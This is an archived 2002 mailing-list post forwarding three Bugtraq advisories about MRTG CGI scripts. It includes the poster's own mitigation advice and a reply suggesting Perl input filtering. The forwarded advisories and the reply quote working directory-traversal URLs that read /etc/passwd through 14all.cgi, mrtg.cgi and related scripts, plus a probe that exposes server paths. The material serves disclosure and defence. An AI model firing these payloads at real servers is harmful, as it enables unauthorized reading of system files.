[rrd-users] "vulnerabilities" in MRTG-related CGI scripts
Dave Plonka
plonka at doit.wisc.edu
Mon Feb 4 19:31:09 MET 2002
RRDTOOL/MRTG users,
[I haven't posted this to the MRTG list since I'm not on it...]
FYI, below I've included three "vulnerability" announcements regarding
MRTG and MRTG-related CGI scripts. These announcements were recently
posted to the very-popular, very-public "bugtraq" mailing list.
Regarding their validity, I tested an old "14all.cgi" script that I
have verified that it was possible to cause it to expose the first line
of public files, such as "/etc/passwd". (Whether or not you wish to
consider that a vulnerability is up to you.)
FWIW, my suggestion is to do one of the following if you are running
*any* common/popular CGI scripts that are not meant to be accessible to
the general public:
1) For private web servers (i.e. those not meant to be used by the
general public), implement a firewall policy to prevent HTTP
connections from arbitrary hosts.
2) For public web servers, use your web server software's
authentication features to restrict access to the CGI scripts.
3) For public web servers on which CGI scripts are meant to be used
only by those with explicit knowledge of them, give your CGI scripts
unusual names, so that someone probing for them by their default
names are unlikely to find them.
Lastly, please keep in mind that I did not report these vulnerabilities
nor would I have done so without posting workarounds or fixes), I'm
just forwarding them to folks that might be interested. If you have
meaningful follow-ups please consider posting them to "bugtraq".
If you're not familiar with "bugtraq" here's the FAQ:
http://www.securityfocus.com/popups/forums/bugtraq/faq.shtml
Dave
P.S. Normally you can view the bugtraq archive here:
http://www.securityfocus.com/archive/1
but it currently seems out of date (so these new messages doen't show
up there yet, although I have received them from the mailing list).
----- Forwarded message from UkR-XblP? <cuctema at ok.ru> -----
From: "UkR-XblP?" <cuctema at ok.ru>
Subject: new advisory
To: BUGTRAQ at securityfocus.com
X-Mailer: CommuniGate Pro Web Mailer v.3.5.2
Date: Sat, 02 Feb 2002 04:47:29 +0300
---=== UkR Security Team advisory
===---
Name : MRTG CGI script "show files" Vulnerability
About : The Multi Router Traffic Grapher (MRTG) is
a tool to monitor the traffic
load on network-links. MRTG generates
HTML pages containing GIF
images which provide a LIVE visual
representation of this traffic
Product vendor: MRTG / http://www.mrtg.org
Problem : Problem lyes in incorrect validation of
user submitted
-by-browser information, that can show
first string of any file of the
system where script installed.
Workaround : this will help in somewhat : $input =~
s/[(\.\.)|\/]//g;
Author : UkR-XblP / UkR security team
Exploit :
http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
---
Professional hosting for everyone - http://www.host.ru
----- End forwarded message -----
----- Forwarded message from Tamer Sahin <ts at securityoffice.net> -----
From: "Tamer Sahin" <ts at securityoffice.net>
To: <bugtraq at securityfocus.com>
Subject: Mrtg Path Disclosure Vulnerability
Date: Mon, 4 Feb 2002 02:18:54 +0200
Organization: http://www.securityoffice.net
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Mrtg Path Disclosure Vulnerability
Type:
Input Validation Error
Release Date:
February 4, 2002
Product / Vendor:
The Multi Router Traffic Grapher (Mrtg) is a tool to monitor the
traffic load on network-links. Mrtg generates html pages containing
gif images which provide a live visual representation of this
traffic.
http://www.mrtg.org
Summary:
If an attacker submits a web request containing unexpected arguments
for script variables, an error message will be displayed containing
the path to the webroot directory of the server running the Mrtg cgi
script.
http://host/mrtg.cgi?cfg=blabla
Tested:
Mrtg v2.090011
Mrtg v2.090006
Vulnerable:
Mrtg v2.090011
Mrtg v2.090006
And may be other.
Disclaimer:
http://www.securityoffice.net is not responsible for the misuse or
illegal use of any of the information and/or the software listed on
this security advisory.
Author:
Tamer Sahin
ts at securityoffice.net
http://www.securityoffice.net
Tamer Sahin
http://www.securityoffice.net
PGP Key ID: 0x2B5EDCB0 Fingerprint:
B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
iQA/AwUBPF3TbLuLpFMrXtywEQIU5QCghYmngYvhwveU+8W3JwTz5QtsmU0AoJZD
Tbl6HDhKVnFPEy1DSB3/q3AH
=+kUc
-----END PGP SIGNATURE-----
----- End forwarded message -----
----- Forwarded message from sj at datanet.hu -----
Date: Mon, 4 Feb 2002 12:05:47 +0100 (CET)
From: sj at datanet.hu
To: bugtraq at securityfocus.com
Subject: RE: new advisory
I think some filtering after the line '$q = new CGI;' would help a little
Eg.
my $SECMSG = 'Pliz dont hekk us\n";
if(!defined $q->param('cfg')){ die "missing cfg file\n"; }
my $xx = $q->param('cfg');
if($xx =~ /\.\.|\/\/|\.\//){ die $SECMSG; }
if($xx =~ tr/a-zA-Z0-9_\-//dc){ die $SECMSG; }
you could also check the ownership of $cfgfile and deny opening
root (and maybe other) owned files.
>>Exploit :
>>
>>http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
>>http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
>>http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
>>http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
SJ.
----- End forwarded message -----
--
plonka at doit.wisc.edu http://net.doit.wisc.edu/~plonka ARS:N9HZF Madison, WI
--
Unsubscribe mailto:rrd-users-request at list.ee.ethz.ch?subject=unsubscribe
Help mailto:rrd-users-request at list.ee.ethz.ch?subject=help
Archive http://www.ee.ethz.ch/~slist/rrd-users
WebAdmin http://www.ee.ethz.ch/~slist/lsg2.cgi
More information about the rrd-users
mailing list